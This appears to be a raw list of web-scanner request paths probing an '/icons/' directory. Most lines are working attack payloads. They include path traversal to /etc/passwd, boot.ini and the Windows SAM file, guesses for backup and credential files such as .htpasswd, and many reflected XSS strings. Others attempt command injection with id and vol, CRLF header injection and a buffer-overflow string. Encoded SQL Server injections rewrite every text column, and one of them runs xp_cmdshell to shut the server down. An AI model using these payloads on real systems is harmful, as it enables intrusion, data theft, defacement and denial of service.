/icons/php/php.exe?c:\winnt\repair\sam
/icons/php3/php.exe?c:\boot.ini
/icons/php3/php.exe?c:\winnt\repair\sam
/icons/php4/php.exe?c:\boot.ini
/icons/php4/php.exe?c:\winnt\repair\sam
/icons/phpmyadmin/sql.php3?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd
/icons/phpmyadmin/sql.php?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd
/icons/postinfo.asp
/icons/prn.nsf
/icons/products.dbf
/icons/profile.php?mode=editprofile
/icons/pubs.dbf
/icons/query.idq?CiTemplate=query.idq
/icons/query.idq?CiTemplate=query.idq%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
/icons/query.inc
/icons/RCS/
/icons/README
/icons/README%20
/icons/README%3F+.htr
/icons/README+.htr
/icons/README-
/icons/README-old
/icons/README.
/icons/README.$$$
/icons/README.-old
/icons/README.0
/icons/README.000
/icons/README.1
/icons/README.2
/icons/README.3
/icons/README.4
/icons/README.5
/icons/README.6
/icons/README.7
/icons/README.8
/icons/README.9
/icons/README.arc
/icons/README.bac
/icons/README.backup
/icons/README.BAK
/icons/README.bckp
/icons/README.BKP
/icons/README.BKUP
/icons/README.bz2
/icons/README.cs
/icons/README.csproj
/icons/README.diff
/icons/README.gz
/icons/README.htm
/icons/README.html
/icons/README.html-
/icons/README.html-old
/icons/README.html.
/icons/README.html.-old
/icons/README.html.0
/icons/README.html.000
/icons/README.html.1
/icons/README.html.2
/icons/README.html.3
/icons/README.html.4
/icons/README.html.5
/icons/README.html.6
/icons/README.html.7
/icons/README.html.8
/icons/README.html.9
/icons/README.html.ARC
/icons/README.html.BAC
/icons/README.html.BACKUP
/icons/README.html.bak
/icons/README.html.bckp
/icons/README.html.BKP
/icons/README.html.bkup
/icons/README.html.bz2
/icons/README.html.cs
/icons/README.html.diff
/icons/README.html.gz
/icons/README.html.INC
/icons/README.html.las
/icons/README.html.lnk
/icons/README.html.log
/icons/README.html.lst
/icons/README.html.o
/icons/README.html.OLD
/icons/README.html.old-
/icons/README.html.old0
/icons/README.html.old1
/icons/README.html.old2
/icons/README.html.old3
/icons/README.html.old4
/icons/README.html.old5
/icons/README.html.old6
/icons/README.html.old7
/icons/README.html.old8
/icons/README.html.old9
/icons/README.html.orig
/icons/README.html.resx
/icons/README.html.sav
/icons/README.html.save
/icons/README.html.saved
/icons/README.html.tar
/icons/README.html.temp
/icons/README.html.tgz
/icons/README.html.TMP
/icons/README.html.txt
/icons/README.html.vb
/icons/README.html.vsss.tmp
/icons/README.html.Z
/icons/README.html.zip
/icons/README.html.~1
/icons/README.html.~bk
/icons/README.html/%22%3e%3cscript%3ealert(xss)%3c/script%3e
/icons/README.html/%3cimg%20src%3d%22javascript%3aalert(xss)%22%3e
/icons/README.html/?>'"><script>alert(xss)</script>
/icons/README.html;.cfm
/icons/README.html_
/icons/README.html~
/icons/README.html~1
/icons/README.html~bk
/icons/README.inc
/icons/README.las
/icons/README.lnk
/icons/README.log
/icons/README.lst
/icons/README.o
/icons/README.OLD
/icons/README.old-
/icons/README.old0
/icons/README.old1
/icons/README.old2
/icons/README.old3
/icons/README.old4
/icons/README.old5
/icons/README.old6
/icons/README.old7
/icons/README.old8
/icons/README.old9
/icons/README.orig
/icons/README.resx
/icons/README.sav
/icons/README.save
/icons/README.saved
/icons/README.sln
/icons/README.tar
/icons/README.temp
/icons/README.tgz
/icons/README.tmp
/icons/ReadMe.txt
/icons/README.vb
/icons/README.vbproj
/icons/README.vsss.tmp
/icons/README.Z
/icons/README.zip
/icons/README.~1
/icons/README.~bk
/icons/README/%22%3e%3cscript%3ealert(xss)%3c/script%3e
/icons/README/%3cimg%20src%3d%22javascript%3aalert(xss)%22%3e
/icons/README/?>'"><script>alert(xss)</script>
/icons/README1
/icons/README;.cfm
/icons/README?%3E%27%22%3E%3Cscript%3Ealert%2827144%29%3C%2Fscript%3E=123
/icons/README?%3E%27%22%3E%3Cscript%3Ealert%2827148%29%3C%2Fscript%3E=123
/icons/README?>'"><script>alert(xss)</script>
/icons/README?dbg=on
/icons/README?DEBUG=1
/icons/README?DEBUG=ON
/icons/README?Debug=T
/icons/README?Debug=true
/icons/README?Debug=yes
/icons/READMETA
/icons/README\
/icons/README_
/icons/README~
/icons/README~1
/icons/README~1.lnk
/icons/README~bk
/icons/register.htm
/icons/register.html
/icons/register.txt
/icons/registration.htm
/icons/registration.html
/icons/registration.txt
/icons/registrations.htm
/icons/registrations.html
/icons/registrations.txt
/icons/repost.asp
/icons/robots.txt
/icons/root.exe
/icons/samples/asp/viewcode.asp?file=index.asp
/icons/samples/ctguestb.idc
/icons/samples/ctguestbook.idc
/icons/samples/details.idq
/icons/samples/search/author.idq
/icons/samples/search/filesize.idq
/icons/samples/search/filetime.idq
/icons/samples/search/qfullhit.htw?ciwebhitsfile=/../../../../boot.ini&cirestriction=none&cihilitetype=full
/icons/samples/search/qsumrhit.htw?ciwebhitsfile=/../../../../boot.ini&cirestriction=none&cihilitetype=full
/icons/samples/search/query.idq
/icons/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwd&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm
/icons/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwl&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm
/icons/samples/search/simple.idq
/icons/samples/search/webhits.exe
/icons/samples/Test11.asp
/icons/scripts/comments.txt
/icons/scripts/iisadmin/bdir.htr
/icons/security.dbf
/icons/SELECT%09'aa'%09FROM%09TAB
/icons/sendmail.inc
/icons/server.log
/icons/servervar.asp
/icons/servervariables.asp
/icons/servervariables_vbscript.asp
/icons/servervars.asp
/icons/services
/icons/servlet
/icons/shop$db.asp
/icons/Shortcut%20to%20README
/icons/Shortcut%20to%20README.html
/icons/Shortcut%20to%20README.html.lnk
/icons/Shortcut%20to%20README.lnk
/icons/Shortcut%20to%20small
/icons/Shortcut%20to%20small.lnk
/icons/showfile.asp
/icons/sitelist.txt
/icons/sitemap.gz
/icons/sitemap.xml
/icons/sitemap.xml.gz
/icons/sitestat.asp
/icons/sitestat.cgi
/icons/sitestat.htm
/icons/sitestat.html
/icons/sitestat.php
/icons/sitestats.asp
/icons/sitestats.cgi
/icons/sitestats.htm
/icons/sitestats.html
/icons/sitestats.php
/icons/site_mgmt.htm
/icons/site_mgmt.html
/icons/small"><script>alert(097531);</script>
/icons/small-
/icons/small-old
/icons/small.
/icons/small.-old
/icons/small.0
/icons/small.000
/icons/small.1
/icons/small.2
/icons/small.3
/icons/small.4
/icons/small.5
/icons/small.6
/icons/small.7
/icons/small.8
/icons/small.9
/icons/small.ARC
/icons/small.bac
/icons/small.backup
/icons/small.bak
/icons/small.bckp
/icons/small.bkp
/icons/small.bkup
/icons/small.bz2
/icons/small.diff
/icons/small.gz
/icons/small.inc
/icons/small.las
/icons/small.lnk
/icons/small.log
/icons/small.lst
/icons/small.o
/icons/small.old
/icons/small.old-
/icons/small.old0
/icons/small.old1
/icons/small.old2
/icons/small.old3
/icons/small.old4
/icons/small.old5
/icons/small.old6
/icons/small.old7
/icons/small.old8
/icons/small.old9
/icons/small.orig
/icons/small.sav
/icons/small.save
/icons/small.saved
/icons/small.tar
/icons/small.temp
/icons/small.tgz
/icons/small.tmp
/icons/small.txt
/icons/small.Z
/icons/small.zip
/icons/small.~1
/icons/small.~bk
/icons/small/
/icons/small/%00/
/icons/small/%2e%2e/%2e%2e/%00.jsp
/icons/small/%2E/
/icons/small/%2F/
/icons/small/%5C/
/icons/small/.access
/icons/small/.addressbook
/icons/small/.bashrc
/icons/small/.bash_history
/icons/small/.cobalt/alert/service.cgi?service=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/icons/small/.DS_Store
/icons/small/.FBCIndex
/icons/small/.forward
/icons/small/.htaccess
/icons/small/.htaccess.old
/icons/small/.htpasswd
/icons/small/.passwd
/icons/small//%22%3e%3cscript%3ealert(xss)%3c/script%3e
/icons/small//%3cimg%20src%3d%22javascript%3aalert(xss)%22%3e
/icons/small//?>'"><script>alert(xss)</script>
/icons/small//NoneExistent%0d%0aInjectedHeadernjectedValue
/icons/small//Sites/Knowledge/Membership/Inspired/ViewCode.asp?file=index.asp
/icons/small//Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp?file=index.asp
/icons/small//Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp?file=index.asp
/icons/small//Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp?file=index.asp
/icons/small//Sites/Samples/Knowledge/Push/ViewCode.asp?file=index.asp
/icons/small//Sites/Samples/Knowledge/Search/ViewCode.asp?file=index.asp
/icons/small//siteserver/publishing/viewcode.asp?file=index.asp
/icons/small//th1s1sanonexistantf1l3.1224703657
/icons/small/1170627984
/icons/small/123%0a%0a%3ealert(xss)%3b%3c/script%3e123.jsp
/icons/small/21036885.old
/icons/small/<oot.ini
/icons/small/>+ACJ-+AD4APB-SCRIPT/TYPE=TEXT/VBSCRIPT+AD7-MSGBOX(xss)+AA0APB-/SCRIPT+AD7-
/icons/small/?>'"><script>alert(xss)</script>
/icons/small/?C=
/icons/small/?C="
/icons/small/?C="'><A%20HREF="/WF_XSRF.html">Injected%20Link</A>
/icons/small/?C="'><IMG%20SRC="/WF_XSRF.html">
/icons/small/?C="></IFRAME><script>alert(xss)</script>
/icons/small/?C="></style><script>alert(xss)</script>
/icons/small/?C="></STYLE><STYLE>@import"javascriptt(xss)";</STYLE>
/icons/small/?C="></title><script>alert(xss)</script>
/icons/small/?C=%00
/icons/small/?C=%20onMouseOver=alert(xss)>
/icons/small/?C=%22%20%7C%20%22id
/icons/small/?C=%22%20%7C%20%22vol
/icons/small/?C=%22%20onMouseOver=alert(xss)>
/icons/small/?C=%22%20style%3D%22backgroundession(alert(xss))%22%20OA%3D%22
/icons/small/?C=%22%27
/icons/small/?C=%26%26id
/icons/small/?C=%26%26vol
/icons/small/?C=%27%20%7C%20%27id
/icons/small/?C=%27%20%7C%20%27vol
/icons/small/?C=%27%22%3E%3Cscript%3Ealert(xss)%3C%2Fscript%3E
/icons/small/?C=%27;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0049004D00470020005300520043003D0022002F00570046005F0058005300520046002E00680074006D006C0022003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(xss));EXEC(@S);--
/icons/small/?C=%27;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700%20AS%20NVARCHAR(xss));EXEC(@S);--
/icons/small/?C=%7C%7Cid
/icons/small/?C=%7C%7Cvol
/icons/small/?C=%7Cid
/icons/small/?C=%7Cvol
/icons/small/?C=%A7%A2%BE%BC%F3%E3%F2%E9%F0%F4%BE%E1%EC%E5%F2%F4%A827664%A9%BC%AF%F3%E3%F2%E9%F0%F4%BE
/icons/small/?C='
/icons/small/?C='"><iframe%20src=javascriptt(xss)>
/icons/small/?C='%20+%20''%20+%20'N;O=D
/icons/small/?C='%20onMouseOver=alert(xss)>
/icons/small/?C='%20||%20'N;O=D
/icons/small/?C=)
/icons/small/?C=--><script>alert(xss)</script>
/icons/small/?C=../../../../../../bin/id|
/icons/small/?C=../../../../../../usr/bin/id|
/icons/small/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini
/icons/small/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
/icons/small/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
/icons/small/?C=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/winnt/win.ini
/icons/small/?C=/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/icons/small/?C=/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
/icons/small/?C=/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
/icons/small/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini
/icons/small/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/icons/small/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/icons/small/?C=/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/win.ini
/icons/small/?C=/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../boot.ini
/icons/small/?C=/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/icons/small/?C=/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../winnt/win.ini
/icons/small/?C=/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini
/icons/small/?C=/..%5C..%5C..%5C..%5C..%5C..%5C/windows/win.ini
/icons/small/?C=/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
/icons/small/?C=/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../boot.ini
/icons/small/?C=/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/icons/small/?C=/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/win.ini
/icons/small/?C=/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../boot.ini
/icons/small/?C=/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/icons/small/?C=/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/win.ini
/icons/small/?C=/../../../../../../../../boot.ini
/icons/small/?C=/../../../../../../../../etc/passwd
/icons/small/?C=/../../../../../../../../windows/win.ini
/icons/small/?C=/../../../../../../../../winnt/win.ini
/icons/small/?C=;
/icons/small/?C=;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0049004D00470020005300520043003D0022002F00570046005F0058005300520046002E00680074006D006C0022003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(xss));EXEC(@S);
/icons/small/?C=;DECLARE%20@S%20NVARCHAR(xss);SET%20@S=CAST(0ª650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700%20AS%20NVARCHAR(xss));EXEC(@S);
/icons/small/?C=;vol|
/icons/small/?C=</TextArea><script>alert(xss)</script>
/icons/small/?C=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(xss)>
/icons/small/?C=>"><%00script>alert(xss)</script>
/icons/small/?C=>"><script>alert(xss)</script>
/icons/small/?C=>%22%27><img%20src%3d%22javascriptt(xss)%22>
/icons/small/?C=>'><%00script>alert(xss)</script>
/icons/small/?C=>'><script>alert(xss)</script>
/icons/small/?C=>+ACJ-+AD4APB-SCRIPT/TYPE=TEXT/VBSCRIPT+AD7-MSGBOX(xss)+AA0APB-/SCRIPT+AD7-
